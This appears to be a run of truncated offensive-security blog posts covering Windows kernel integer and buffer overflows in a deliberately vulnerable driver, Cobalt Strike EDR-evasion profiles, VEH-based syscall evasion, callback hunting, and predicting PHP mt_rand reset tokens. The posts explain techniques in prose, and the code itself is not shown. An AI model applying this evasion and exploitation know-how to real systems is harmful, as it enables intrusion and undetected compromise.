Understanding Integer Overflow in Windows Kernel Exploitation
In this blog post, we will explore integer overflows in Windows kernel drivers and cover how arithmetic operations can lead to security vulnerabilities. We will analyze real-world cases, build a custom vulnerable driver, and demonstrate how these flaws can impact memory allocations and system stability. What is Integer Overflow in the Kernel? Integer overflow occurs when an arithmetic operation exceeds the maximum value a data type can hold, causing it to wrap around. In the Windows kernel, integer overflows can lead to memory corruption, buffer overflows, or incorrect size calculations in kernel allocations, often resulting in heap corruption, out-of-bounds writes, and bug checks (AKA “blue screen of death” or BSOD). These vulnerabilities can arise in multiple ways: Before we dive into integer overflow vulnerabilities in the Windows kernel, let’s first understand data types and how they work in memory. Understanding Data Types When working with low-level programming in C and C++, especially in Windows kernel and user mode applications, choosing the right data type is critical. A wrong choice can lead to integer overflows, memory corruption, privilege escalation, and serious security vulnerabilities. To make things easier, I’ve put together a cheat sheet that you can refer back to whenever you’re analyzing a kernel driver or a user-mode application for potential bugs. This table gives you a quick overview of how different data types store values and where things can go wrong. Use this as your go-to reference when hunting for integer overflows, wraparounds, and other dangerous bugs in kernel and user-mode applications. Data Type Size (x64/x86) Signed Range Unsigned Range Used In char 1 byte -128 to 127 0 to 255 User & Kernel unsigned char 1 byte N/A 0 to 255 User & Kernel signed char 1 byte -128 to 127 N/A User & Kernel short 2 bytes -32,768 to 32,767 0 to 65,535 User & Kernel unsigned short 2 bytes N/A 0 to 65,535 User & Kernel signed short 2 bytes -32,768 to 32,767 N/A User & Kernel int 4 bytes -2,147,483,648 to 2,147,483,647 0 to 4,294,967,295 User & Kernel unsigned int 4 bytes N/A 0 to 4,294,967,295 User & Kernel signed int 4 bytes -2,147,483,648 to 2,147,483,647 N/A User & Kernel long (Windows) 4 bytes (x86/x64) -2,147,483,648 to 2,147,483,647 0 to 4,294,967,295 User & Kernel unsigned long 4 bytes N/A 0 to 4,294,967,295 User & Kernel signed long 4 bytes -2,147,483,648 to 2,147,483,647 N/A User & Kernel long long 8 bytes -9,223,372,036,854,775,808 to 9,223,372,036,854,775,807 0 to 18,446,744,073,709,551,615 User & Kernel unsigned long long 8 bytes N/A 0 to 18,446,744,073,709,551,615 User & Kernel signed long long 8 bytes -9,223,372,036,854,775,808 to 9,223,372,036,854,775,807 N/A User & Kernel SIZE_T 8 bytes (x64) / 4 bytes (x86) N/A 0 to 18,446,744,073,709,551,615 (x64) / 4,294,967,295 (x86) User & Kernel SSIZE_T 8 bytes (x64) / 4 bytes (x86) -9,223,372,036,854,775,808 to 9,223,372,036,854,775,807 (x64) / -2,147,483,648 to 2,147,483,647 (x86) N/A User & Kernel ULONG 4 bytes N/A 0 to 4,294,967,295 Kernel Only ULONGLONG 8 bytes N/A 0 to 18,446,744,073,709,551,615 Kernel Only DWORD 4 bytes 0 to 4,294,967,295 Same as unsigned int User & Kernel NTSTATUS 4 bytes Varies (signed) N/A Kernel Only HANDLE 8 bytes (pointer) System pointer System pointer User & Kernel The above data sheet provides a comprehensive reference for both user mode and kernel mode data types, covering their sizes, ranges, and potential overflow scenarios. This information is based on official Microsoft documentation and kernel data types and serves as a valuable resource for identifying vulnerabilities related to integer overflows in kernel drivers. Common Data Types That Can Cause Integer Overflow in Kernel Data Type Size Signed/Unsigned Range Overflow Type ULONG 4 bytes Unsigned 0 to 4,294,967,295 (0xFFFFFFFF) Unsigned wraparound LONG 4 bytes Signed -2,147,483,648 to 2,147,483,647 Signed overflow ULONG64 8 bytes Unsigned 0 to 18,446,744,073,709,551,615 Large value overflow LONG64 8 bytes Signed -9,223,372,036,854,775,808 to 9,223,372,036,854,775,807 Signed overflow SIZE_T 4 bytes (x86) / 8 bytes (x64) Unsigned Platform-dependent Unsigned wraparound SSIZE_T 4 bytes (x86) / 8 bytes (x64) Signed Platform-dependent Signed overflow LONG_PTR 4 bytes (x86) / 8 bytes (x64) Signed Platform-dependent Pointer arithmetic overflow INT64 8 bytes Signed Same as LONG64 Multiplication overflow Network Packet Overflow in Custom Windows Kernel Drivers (Addition ULONG Overflow) I am demonstrating a custom Windows kernel driver that simulates the processing of network packets. To understand the vulnerability, let’s first discuss ULONG and its range. In Windows, ULONG is a 32-bit unsigned integer, meaning it can hold values from 0x00000000 (0 in decimal) to 0xFFFFFFFF (4,294,967,295 in decimal). Since it cannot store negative values, any arithmetic operation that exceeds 0xFFFFFFFF causes an integer overflow, wrapping the value back to a much smaller number instead of continuing to increase. This behavior is the root cause of the vulnerability in my custom driver. The vulnerable function in this custom driver takes a user-supplied packet size and adds 0x1000 to determine how much memory to allocate for storing the packet. However, if an attacker provides a large value like 0xFFFFFFFF, adding 0x1000 causes an integer wraparound, meaning instead of a large allocation, the kernel ends up allocating a much smaller buffer than expected. For example, 0xFFFFFFFF + 0x1000 wraps around to 0x00000FFF, allocating only 4,095 bytes instead of the intended large buffer. Triggering the Bug: Integer Wraparound in Packet Allocation I created a simple PoC (proof of concept) to trigger the vulnerable line in the driver. The function takes a user-supplied packet size and adds 0x1000 for memory allocation. However, providing a large value like 0xFFFFFFFF causes an integer wraparound, resulting in a much smaller allocation (0x00000FFF instead of the intended large buffer), leading to a crash. The crash occurred at: movntps xmmword ptr [rcx-10h], xmm0, attempting to write beyond the allocated buffer at rcx = ffff860d714f1010, which is already out of bounds from the 0x1000-byte allocation at RAX. This confirms an out-of-bounds memory write due to the integer overflow in the allocation size calculation. Packet Size Overflow in Custom Windows Kernel Drivers (Signed Integer Overflow Long) I am demonstrating a custom Windows kernel driver that simulates the processing
Harnessing the Power of Cobalt Strike Profiles for EDR Evasion – Part 2
This blog post is a continuation of the previous entry “Harnessing the Power of Cobalt Strike Profiles for EDR Evasion“, we covered the malleable profile aspects of Cobalt Strike and its role in security solution evasion. Since the release of version 4.9, Cobalt Strike has introduced a number of significant updates aimed at improving operator flexibility, evasion techniques, and custom beacon implementation. In this post, we’ll dive into the latest features and enhancements, examining how they impact tradecraft and integrate into modern adversary simulation workflows.We will build an OPSEC-safe malleable C2 profile that incorporates the latest best practices and features. All codes and scripts referenced throughout this post are available on our GitHub repository. CS 4.9 – Post-Exploitation DLLs Cobalt Strike 4.9 introduces a new malleable C2 option, post-ex.cleanup. This option specifies whether or not to clean up the post-exploiation reflective loader memory when the DLL is loaded.Our initial attempt was to extract the post-exploitation DLLs within the Cobaltstrike JAR file: Upon checking for strings, nothing was detected as the DLLs are encrypted.When checking the documentation, we stumbled upon the POSTEX_RDLL_GENERATE hook. This hook takes place when the beacon is tasked to perform a post exploitation task such as keylogging, taking a screenshot, run Mimikatz, etc. According to the documentation, the raw Post-ex DLL binary is passed as the second argument. So we created a simple script, to save its value to the disk: Load the CNA script to the Cobal Strike client, and task the beacon to perform a post-exploitation task (this case a screenshot): Tasking the beacon with all the possible post-exploitation tasks, will provided us all the 10 post-ex DLLs: After extracting the DLLs, find all the strings within. We come up with the following set of profile configuration (shortened for readability) on preventing any potential static detection: The full profile with all the found strings can be found here. Note: It is highly recommended to replace the plaintext strings with something meaningful to the operator, since the changes will be outputted during or after the post-exploitation job. For example, in the image below we modified the string to show them in reverse during a port scan: Beacon Data Store Beacon data store allows us to stored items to be executed multiple times without having to resend the item. The default data store size is 16 entries, although this can be modified by configuring the stage.data_store_size option within your Malleable C2 profile to match your needs: WinHTTP Support Even though there is a new profile option to set a default internet library, we will not be including the option in our profile. The reason is that both libraries are heavily monitored from security solutions and there is no difference in terms of evasion between the libraries. What matters, is a good red team infrastructure which bypasses the network and memory detection.However, if you prefer to using a specific library (in this case winhttp.dll), the following option can be applied to the profile: CS 4.10 – BeaconGate BeaconGate is a feature that instructs Beacon to intercept supported API calls via a custom Sleep Mask. This allows the developer to implement advanced evasion techniques without having to gain control over Beacon’s API calls through IAT hooking in a UDRL, a method that is both complex and difficult to execute. It is recommended that you have the profile configured to proxy all the 23 functions that Cobalt Strike currently supports (as of 4.11). This can be done by setting the new stage.beacon_gate Malleable C2 option, as demonstrated below: The profile will also enable the use of BeaconGate where we later start playing with it. This is crucial, otherwise the changes will not be applied to exported Beacons. To get started, we need to work with Sleepmask-VS project from Fortra’s repository. If you prefer the Linux environment for development, you can use the Artifact Kit template instead. The BeaconGateWrapper function in /library/gate.cpp is where these API calls are handled. The following demo code checks if the the VirtualAlloc function is called. This enabled us to intercept the execution flow and add the evasion mechanism(s): The same can be applied for all the other supported high-level API functions. In this example, we are going to implement callback spoofing mechanism. Since the goal of this blog is to explain how the BeaconGate implementation works, we will use the HulkOperator’s code for the spoofing mechanism. The custom SetupConfig function expects a function pointer to spoof. This can be achieved by utilizing the functionCall structure. The functionPtr field holds the pointer to the WinAPI function you want to hook. To access the function’s name, you can use functionCall->function, and for the number of arguments, use functionCall->numOfArgs. Individual argument values can be retrieved via functionCall->args[i]. Here’s a proof of concept showing how the final code looks: Next time you export a Beacon, the spoof mechanism will be applied. The final implementation code can be found here. CS 4.11 – Novel Process Injection Cobalt Strike 4.11 introduced a custom process injection technique, ObfSetThreadContext. This injection technique, bypasses the modern detection of injected threads (where the start address of a thread is not backed by a Portable Executable image on disk) by making the use of various gadgets to redirect execution. By default, this new option will automatically set the injected thread start address as the (legitimate) remote image entry point, but can be additionally configured with custom module and offset as shown below: The option above sets ObfSetThreadContext as the default process injection technique. The next injection techniques servers as a backup when the default injection technique fails. This happens on certain cases (i.e. x86 -> x64 injection, self-injection etc.) CS 4.11 – sRDI with evasion capabilities According to Fortra, the version 4.11 ports Beacon’s default reflective loader to a new prepend/sRDI style loader with several new evasive features added. sRDI enables the transformation of DLL files into position-independent shellcode. It functions as a comprehensive PE loader, handling correct section permissions, TLS callbacks, and various integrity
Windows Kernel Buffer Overflow
In this blog post, we will explore buffer overflows in Windows kernel drivers. We’ll begin with a brief discussion of user-to-kernel interaction via IOCTL (input/output control) requests, which often serve as an entry point for these vulnerabilities. Next, we’ll delve into how buffer overflows occur in kernel-mode code, examining different types such as stack overflow, heap overflow, memset overflow, memcpy overflow, and more. Finally, we’ll analyze real-world buffer overflow cases and demonstrate potential exploitation in vulnerable drivers. Understanding IOCTL in Windows Kernel Drivers When working with Windows kernel drivers, understanding communication between user-mode applications and kernel-mode drivers is crucial. One common way to achieve this is through IOCTL (input/output control). IOCTL allows user-mode applications to send commands and data to drivers using the DeviceIoControl() function. In the kernel, these requests are received as I/O Request Packets (IRPs), specifically handled in the driver’s IRP_MJ_DEVICE_CONTROL function. The driver processes the IRP, performs the requested action, and optionally returns data to the user-mode application. We won’t dive too deep into the details, but we’ll cover the basics of IOCTL and how it functions through a simple driver example. This diagram is sourced from MatteoMalvica. Breaking Down IOCTL and IRP in Custom Driver Define a Custom IOCTL The line highlighted in red defines a custom IOCTL (input/output control) code using the CTL_CODE macro, which is used by both user-mode applications and kernel-mode drivers to communicate. Handling IOCTL Requests (IRP_MJ_DEVICE_CONTROL) In the driver, IOCTL requests are handled inside the IOCTL function, which is assigned to IRP_MJ_DEVICE_CONTROL. Before calling DeviceIoControl(), a user-mode application must first obtain a handle to the driver using CreateFile(). This handle is necessary to communicate with the driver and ensures that the IOCTL request is sent to the correct device. The handle is passed to DeviceIoControl() with a code and buffer which is processed by the function specified by IRP_MJ_DEVICE_CONTROL (in this case, the IOCTL function). Retrieving IRP Details Inside the IOCTL function, the driver extracts details about the request using IoGetCurrentIrpStackLocation(Irp). The Irp->AssociatedIrp.SystemBuffer parameter is used to access the user-mode buffer because that’s where the I/O manager places the buffer passed in. Meanwhile, irpSp->Parameters.DeviceIoControl.InputBufferLength provides the size of the received data, ensuring we handle it correctly. The stack pointer irpSp (retrieved using IoGetCurrentIrpStackLocation(Irp)) gives access to request-specific parameters, keeping buffer handling separate from other IRP structures to prevent memory corruption. Custom Function The IOCTL function processes user-mode requests sent via DeviceIoControl(). It checks the IOCTL code, retrieves the user buffer, and prints the received message if data is available. Finally, it sets the status and completes the request. Sending an IOCTL from User Mode to a Kernel Driver This simple program communicates with a Windows kernel driver by issuing an IOCTL (input/output control) request. It begins by opening a handle to the driver (\\.\Hello) and then transmits data using DeviceIoControl with the IOCTL_PROC_DATA code. If the operation succeeds, the driver processes the input; otherwise, an error message is displayed. Finally, the program closes the device handle and terminates. Running the User-Mode Application to Communicate with the Driver In our previous blog post, we explored kernel debugging and how to load a custom driver. Now, it’s time to run the user-mode application we just created. Once everything is set up, execute the .exe file, and we should see the message appear in DebugView or WinDbg. I’ll try to demonstrate this using DebugView to show how the communication works between user mode and kernel mode. Strange! As you can see in the image, the IOCTL code in user mode appears as 0x222000, but in kernel mode, it shows up as 0x800. This happens due to how CTL_CODE generates the full 32-bit IOCTL value. You can decode the IOCTL using OSR’s IOCTL Decoder tool: OSR Online IOCTL Decoder. Buffer Overflow A buffer overflow happens when more data is written to a buffer than it can hold, causing it to overflow into adjacent memory. Example: Imagine a glass designed to hold 250ml of water. If you pour 500ml, the extra water spills over—just like excess data spilling into unintended memory areas, potentially causing crashes or security vulnerabilities. Memory Allocation in Kernel Drivers and Buffer Overflow Risks In kernel driver development, proper memory management is even more critical than in user mode as there is no exception handling. When memory operations are not handled carefully, they can lead to buffer overflows, causing severe security vulnerabilities such as kernel crashes, privilege escalation, and even arbitrary code execution. For this article, I have developed a custom vulnerable driver to demonstrate how buffer overflows occur in kernel mode. Before diving into exploitation, let’s first explore the common memory allocation and manipulation functions used in Windows kernel drivers. Understanding these functions will help us identify how overflows happen and why they can be exploited. Understanding Kernel Memory Allocation & Vulnerabilities Memory allocation in kernel-mode drivers typically involves dynamically requesting memory from system pools or handling buffers passed from user-mode applications. Below are some common kernel memory allocation functions: 1. Heap-Based Buffer Overflow Here, the driver allocates memory from the NonPagedPool and copies user-supplied data into it using RtlCopyMemory without checking the buffer size. If the input is too large, it overflows into adjacent memory, corrupting the kernel heap. Example Vulnerability: Heap Overflow in Custom Driver Impact: Memory is allocated using ExAllocatePoolWithTag(NonPagedPool, 128, ‘WKL’), but RtlCopyMemory copies inputLength bytes without validation, leading to heap overflow if inputLength is greater than 128. 2. Stack-Based Buffer Overflow Here, the driver copies data from a user-supplied buffer to a small stack buffer using RtlCopyMemory, without verifying whether the destination buffer is large enough. If the input size is too large, it overwrites stack memory, potentially leading to system crashes or arbitrary code execution. Example Vulnerability: Stack Overflow in Custom Driver Impact: A small stack buffer, stackBuffer[100], is used, and RtlCopyMemory copies user data without checking if inputLength exceeds 100 bytes, causing a stack overflow. 3. Overwriting Memory with Memset Here, the driver fills a kernel buffer with a fixed value using memset, but
Understanding Windows Kernel Pool Memory
This blog covers Windows pool memory from scratch, including memory types, debugging in WinDbg, and analyzing pool tags. We’ll also use a custom tool to enumerate pool tags effortlessly and explore the segment heap. This is the first post in our VR (Vulnerability Research) & XD (Exploit Development) series, laying the foundation for heap overflows, pool spraying, and advanced kernel exploitation. What is the Windows Kernel Pool? The Windows Kernel Pool is a memory region used by the Windows kernel and drivers to store system-critical structures. In short, the Kernel Pool is the kernel-land version of the user-mode “heap”. Unlike user-mode memory, the kernel pool is shared across all processes, meaning any corruption in the kernel pool can crash the entire system (BSOD). Pool Internals Essentially, chunks that are allocated and placed into use or kept free are housed on either a page that is pageable or a page that is non-pageable. It may be interesting to know that two types of page exist. One is paged pool and the other is non-paged pool: To sum up, in order to take advantage of a heap corruption vulnerability, such as a use-after-free (UAF), a researcher will make a distinction as to whether it is a UAF on the non-paged pool, or a UAF on the paged pool. This is important because the paged pool and non-paged pool are different heaps, meaning they are separate locations in memory. In simpler terms, in order to replace the freed chunk, one must trigger the use-after-free event. This means that there are different object structures that can be placed on the non-paged pool or, respectively, the paged pool. Setting Up Kernel Debugging To get started with kernel debugging, you need to set up a Windows VM and configure it using the following admin commands. Typically, this setup requires two machines: a debuggee system that is our target Windows machine and a debugger system that we will be issuing debug commands from. For basic debugging, you can use local kernel debugging (lkd) on a single system. If you haven’t installed it yet, you can download the Windows Debugging Tools from Microsoft’s official website. Now, on your base machine, start WinDbg and try to enter the port number and key. After that, restart the virtual machine. The following screenshot shows kernel debugging on the virtual machine. First, if we want to see basic view pool memory in kernel debugging, we can use the !vm 1 command in WinDbg. This provides a detailed summary of system memory usage, including information about paged pool and non-paged pool allocations. Here, 157 KB represents the current available memory in the system, while 628 KB shows the total committed memory, meaning memory that has been allocated and is in use. This helps in analyzing memory consumption and potential allocation issues in kernel debugging. If you want to explore further, you can use The !vm 2 command in WinDbg. This provides a more detailed breakdown of memory usage across different pool types and memory zones compared to !vm 1. First, Windows provides the API ExAllocatePoolWithTag, which is the primary API used for pool allocations in kernel mode. Drivers use this to allocate dynamic memory, similar to how malloc works in user mode. Note: While ExAllocatePoolWithTag has been deprecated in favor of ExAllocatePool2, it is still widely used in existing drivers so we will examine this function. Later, I will show in detail how to develop a kernel driver by using this API for ExAllocatePoolWithTag. Here’s a short explanation of the key parameters used in Windows pool memory allocation: There’s more than one kind of _POOL_TYPE. If you want to explore more, you can check out Microsoft’s documentation. We are only focusing on paged pool, non-paged pool, and pool tag. It is also worth mentioning that every chunk of memory on a pool has a dedicated pool header structure inline in front of the allocation, which we will examine shortly in WinDbg. Now let’s use the !pool <address> command in WinDbg to analyze a specific memory address. We want to display details about a pool allocation, including its PoolType, PoolTag, BlockSize, and owning process/module. As we can see in the screenshot above, the memory allocation is categorized as paged pool. The details also tell us that the page is ‘Allocated’ or free, and we can discover the pool tag and sometimes the details will also give the binary name, driver name, and other information. Feel free to explore. So, the question arises—how do we find the address of a pool allocation? It’s actually quite simple! If we check the documentation, we can see that ExAllocatePoolWithTag is a function provided by NtosKrnl.exe (the Windows kernel). This means we can set breakpoints in WinDbg to track memory allocations in real-time. So first let’s examine the API with a command called x /D nt!ExAlloca* in debugger and then set a breakpoint. Let’s set a breakpoint at that specific address and see if it gets triggered. As shown below, we’re using the bp <address> command. As soon as we resume our debugger with the g (Go) command, it will automatically hit the breakpoint and we can view the information gathered from register. In WinDbg, when analyzing a call to ExAllocatePoolWithTag, you can check the registers to understand the allocation request: By monitoring these values, you can determine how drivers allocate memory and track specific pool tags in the kernel. We will demonstrate another register rax, but first try to Step Out and use gu. Now, let’s use !pool <address>. But isn’t this strange? We were looking for the tag NDNB. Here’s a handy tip: to find more interesting data, use the command !pool @rax 2. What is a Pool Tag? A Pool Tag is a four-character identifier that helps track memory allocations in Windows kernel pools (PagedPool, NonPagedPool, etc.). Every time memory is allocated using APIs like ExAllocatePoolWithTag, a pool tag is assigned to identify the allocation’s origin. This is useful for debugging memory leaks, analysing kernel memory
HuntingCallbacks – Enumerating the Entire system32
What are Callbacks? Certain Windows APIs support passing a function pointer as one of its parameters. This parameter is then called when a particular event is triggered, or a scenario takes place. Either way, this is usually user-controlled and can be abused from an offensive perspective by passing a malicious function or shellcode. Some of the popularly known callbacks are EnumChildWindows, RegisterClass, etc. There has been much research on the topic of callbacks where they have been abused to be used as call stack evasion, sleep timers, evasion from memory scanners, DLL loading and execution, etc. In this blog post, we try to uncover previously unknown callbacks that could be abused maliciously and produce a tool for the same. In this research, we aim to show how various static analysis methods can be used to create and automate the discovery of previously unknown scenarios and details, and we hope to see more similar contributions in the future. Overview There are two main types of branching in most assembly languages, Windows APIs that support callback opportunities usually take in a function pointer address (or a structure, as you will see) as one of its function arguments. The prototype of the function usually is of the format below: To find a potential function that allows the user to send in a callback function pointer, it needs to satisfy two conditions, As mentioned above, indirect calls are usually compiled to call reg, where reg is any of the registers. But since this research is focused on scanning through multiple windows DLLs, we need to accommodate Control Flow Guard or CFG. Control Flow Guard CFG, in a very simple sense, is a protection mechanism that is placed during compile time within Windows executables to prevent malicious indirect calls that could be abused using ROPs and other memory corruption bugs. Most if not all of the DLLs compiled that we will be scanning are compiled with Control Flow Guard, meaning any function pointers passed through a potential function will not result in a call reg signature. As shown in the following picture, when CFG is enabled, the callee is passed via the RAX register to another wrapper function called __guard_xfg_dispatch_icall_fptr. This function takes in the RAX register to perform the call further. The function __guard_xfg_dispatch_icall_fptr is just a wrapper for a bunch of other sub-functions, which eventually boils down to _guard_dispatch_icall_nop. This function is the final wrapper around the instruction jmp rax where the control flow is redirected toward the user-controlled function pointer. So our plan to scan for potential target Windows APIs that support a callback opportunity is as follows, Note: Some functions have certain checks and verifications that will need to be passed in order to have code reachability towards the CFG dispatch. While executing those potential target functions, the user might need to pass in other parameters or sometimes initialize structures. Prepping Miasm To implement my scanning idea, I chose to go with the Miasm framework because it contains a lot of necessary features that I needed to overengineer the solution. There are several alternatives that could be used that perhaps would be faster or offer a more efficient solution, but coming from a CTF background, Miasm seemed to be the simplest and most appropriate choice to pick, although the concepts described could very well be applicable to other tools. Miasm is a reverse engineering framework that supports symbolic execution and contains its own lifter and IR. It supports Use-Def graphs, in-built disassembler, PE loader, and emulator amongst other stuff. Each of these features will be necessary down the line. Before we proceed to scan every function, we need to initialize a bunch of things with Miasm that will need to be queried moving forward. First, we start by reading the file and passing it to the PE container, which is defined by ContainerPE class. The file data that was read can be passed to the function Container.from_string(data, loc_key) whose return value will be the ContainerPE class. Since we are going to scan an entire directory, we need to check if the files we are scanning are DLLs (some executables also have exported functions, but that is for a future update). We check if the file that we read is a DLL by parsing the Characteristics parameter from it’s COFF Header. If the Characteristics parameter contains the IMAGE_FILE_DLL flag, then we can be mostly sure that we are dealing with a DLL. We then proceed to extract all the functions in the export table of the DLL. Miasm uses an object called LocationDB() that, simply speaking, is an object that keeps track of the symbol names and the corresponding offsets of those symbols within the binary. This is sort of like a separate database populated whenever a new symbol for an offset is defined in the binary. Since the Import Address Table (IAT) contains symbols that will be required for us to check against, we need to populate the loc_db by adding their details and corresponding offset within the binary. This can be performed by parsing the IAT and retrieving both the offset and the symbol using Miasm’s in-built functions. Once all the previously mentioned objects and details are initialized, we can proceed to the core part of the hunt to find the potential target functions. Hunting for Indirect Function Calls In some DLLs, we notice that exported APIs behave as a proxy call to some other DLL; these functions are usually not in the .text section. Attempting to disassemble these exported API obviously will create an exception since there is no actual code block to be disassembled and the exported API is merely a proxy call. Hence, to avoid the tool from crashing in between, we need to add a check that identifies if the address of the exported API that we are scanning is within the .text section and contains the section flag 0x60000020. This can be implemented as follows: We then initialize the disassembly engine of Miasm and
LayeredSyscall – Abusing VEH to Bypass EDRs
Asking any offensive security researcher how an EDR could be bypassed will result one of many possible answers, such as removing hooks, direct syscalls, indirect syscalls, etc. In this blog post, we will take a different perspective to abuse Vectored Exception Handlers (VEH) as a foundation to produce a legitimate thread call stack and employ indirect syscalls to bypass user-land EDR hooks. Disclaimer: The research below must only be used for ethical purposes. Please be responsible and do not use it for anything illegal. This is for educational purposes only. Introduction EDRs use user-land hooks that are usually placed in ntdll.dll or sometimes within the kernel32.dll that are loaded into every process in the Windows operating system. They implement their hooking procedure typically in one of two ways: Hooks are not placed in every function within the target dll. Within ntdll.dll, most of the hooks are placed in the Nt* syscall wrapper functions. These hooks are often used to redirect the execution safely to the EDR’s dll to examine the parameters to determine if the process is performing any malicious actions. Some popular bypasses for circumventing these hooks are: There are more bypass techniques, such as blocking any unsigned dll from being loaded, blocking the EDR’s dll from being loaded by monitoring LdrLoadDll, etc. On the flipside, there are detection strategies that could be employed to detect and perhaps prevent the above-mentioned evasion techniques: The research presented below attempts to address the above detection strategies. LayeredSyscall – Overview The general idea is to generate a legitimate call stack before performing the indirect syscall while switching modes to the kernel land and also to support up to 12 arguments. Additionally, the call stack could be of the user’s choice, with the assumption that one of the stack frames satisfies the size requirement for the number of arguments of the intended Nt* syscall. The implemented concept could also allow the user to produce not only the legitimate call stack but also the indirect syscall in between the user’s chosen Windows API, if needed. Vectored Exception Handler (VEH) is used to provide us with control over the context of the CPU without the need to raise any alarms. As exception handlers are not widely attributed as malicious behavior, they provide us with access to hardware breakpoints, which will be abused to act as a hook. To note, the call stack generation mentioned here is not constructed by the tool or by the user, but rather performed by the system, without the need to perform unwinding operations of our own or separate allocations in memory. This means the call stack could be changed by simply calling another Windows API if detections for one are present. VEH Handler #1 – AddHwBp We register the first handler required to set up the hardware breakpoint at two key areas, the syscall opcode and the ret opcode, both within Nt* syscall wrappers within ntdll.dll. The handler is registered to handle EXCEPTION_ACCESS_VIOLATION, which is generated by the tool, just before the actual call to the syscall takes place. This could be performed in many ways, but we’ll use the basic reading of a null pointer to generate the exception. However, since we must support any syscall that the user could call, we need a generic approach to set the breakpoint. We can implement a wrapper function that takes one argument and proceeds to trigger the exception. Furthermore, the handler can retrieve the address of the Nt* function by accessing the RCX register, which stores the first argument passed to the wrapper function. Once retrieved, we perform a memory scan to find out the offset where the syscall opcode and the ret opcode (just after the syscall opcode) are present. We can do this by checking that the opcodes 0x0F and 0x05 are adjacent to each other like in the code below. Syscalls in Windows as seen in the following screenshot are constructed using the opcodes, 0x0F and 0x05. Two bytes after the start of the syscall, you can find the ret opcode, 0xC3. Hardware breakpoints are set using the registers Dr0, Dr1, Dr2, and Dr3 where Dr6 and Dr7 are used to modify the necessary flags for their corresponding register. The handler uses Dr0 and Dr1 to set the breakpoint at the syscall and the ret offset. As seen in the code below, we enable them by accessing the ExceptionInfo->ContextRecord->Dr0 or Dr1. We also set the last and the second bit of the Dr7 register to let the processor know that the breakpoint is enabled. As you can see in the image below, the exception is thrown because we are trying to read a null pointer address. Once the exception is thrown, the handler will take charge and place the breakpoints. Take note, once the exception is triggered, it is necessary to step the RIP register to the number of bytes required to pass the opcode that generated the exception. In this case, it was 2 bytes. After that, the CPU will continue the rest of the exception and this will perform as our hooks. We will see this performed in the second handler below. VEH Handler #2 – HandlerHwBp This handler contains three major parts: Part #1 – Handling the Syscall Breakpoint Hardware breakpoints, when executed by the system, generate an exception code, EXCEPTION_SINGLE_STEP, which is checked to handle our breakpoints. In the first order of the control flow, we check if the exception was generated at the Nt* syscall start using the member ExceptionInfo->ExceptionRecord->ExceptionAddress, which points to the address where the exception was generated. We proceed to save the context of the CPU when the exception was generated. This allows us to query the arguments stored, which according to Microsoft’s calling convention, are stored in RCX, RDX, R8, and R9, and also allows us to use the RSP register to query the rest of the arguments, which will be further explained later. Once stored, we can change the RIP to point to our demo function; in
Exploiting (GH-13690) mt_rand in php in 2024
This blog post delves into the inner workings of mt_rand(), exposing its weaknesses and demonstrating how these vulnerabilities can be exploited. We’ll examine real-world scenarios and provide insights into more secure alternatives. What is mt_rand in php? This function generates a random value via the Mersenne Twister Random Number Generator (PHP 4, PHP 5, PHP 7, PHP 8). It helps the developer by generating random numbers, but it is actually random? The answer is no based on the PHP documentation [1]: There is a tool developed by openwall called php_mt_seed [2]. The tool receives a bunch of the rand output and gives you the seed that was used. What are the attacking scenarios? There are two: As an example for the first scenario, let’s imagine that there is an admin functionality on a web site that is powered by PHP. This functionally is resetting multiple users’ passwords at the same time. A link is sent to the selected users to reset their passwords, and that link contains a reset token generated by rand. If one of the users was an attacker, the attacker could be able to retrieve the seed and predict the tokens for other users as the seed will be the same. As an example for the second scenario, we have a website powered by PHP 8.0.30, which is vulnerable to GH-13690 or any PHP version is vulnerable to GH-13690. An attacker can request the password be reset for their own account and another account at the same moment (two different HTTP requests). Now the attacker can use their token to predict the seed for the other account. The seed will be different because the rand function is regenerating the seed for every HTTP request, but they can brute force it using the exploit of GH-13690. (Global Mt19937 is not properly reset in-between requests when MT_RAND_PHP is used) Figure 2 – PHP 8 change log In both scenarios, we are exploiting the following function that was found in a real application: Exploiting Scenario 1 Vulnerable code: In the example, the function is generating a password reset for two users but in the same session (same initial state for the mt_rand). The PHP version of our target is latest version: Let’s attack the tokens we need to predict the second token (admin token as an example) using only one of the tokens that was generated (just a normal user token). The following python script will convert the tokens into what the rand function really generated because the rand function is generating a number, not the strings itself: The output of the script will be used with the php_mt_seed tool: The reason “0” and “61” is in the script is because the rand function is bounded from the original PHP code from 0 to 61 and we duplicate the number to achieve the exact match. Now let’s get the next token using the following exploit PHP code by setting the seed: Here is the example output for the target PHP code as below: Here we’ve run the exploit PHP code: The attack was successful and we obtained the token. Exploiting Scenario 2 In this scenario, user1 is the attacker who wants to reset the password for user2, and the website is using a vulnerable PHP version such as 8.0.30 (GH-13690). We are going to attack an application that uses the same mentioned function in this experiment. We installed the application on PHP version 8.0.30. To exploit the issue, we need to send the reset password request for the attacker account and target account at the same time. To do this, we can create a group send in Burp Suite’s Repeater. Make sure to enable the Send group single connection as below: Using MySQL database, we can see the token was generated for the attacker account and target account at the same time. From the attacker’s perspective, we only have access to attacker token, which is F4zrX6rBBHaOadoTwsRvJddtyl5vEeif. With this information, let’s use the same attack process as before. It’s true that we found the seed, but the next seed that was used to generate the target token will be a bit different. Let’s continue to see in what way. If we copy the target token, we can use the same attack to get the seed and compare the target seed and attacker seed: We can see that the first four digits of the seeds are the same. Now all we need to do is brute force the remaining seed, which is only 6 digits! Using our POC to attack: After running the POC PHP script: The attack was successful and the target token was found. Now we need to brute force all of the tokens, which is only 1,000,000 and can be brute forced in couple of hours. Conclusion In this blog post we exploited the PHP mt_rand function in two different scenarios and showed the exploitability in a real world attack. In 2024, mt_rand is still used by programmers to generate random passwords and tokens or even user IDs. The mt_rand function is not secure and puts your software at risk. If you’re looking for a good alternative, we recommend using a secure random generator function like random_int() and random_bytes() to generate secrets and never use mt_rand. [1] https://www.php.net/manual/en/function.mt-rand.php [2] https://github.com/openwall/php_mt_seed
Burp Suite vs. Caido: Navigating the Evolving Landscape of Best Web Application Security Testing Tools
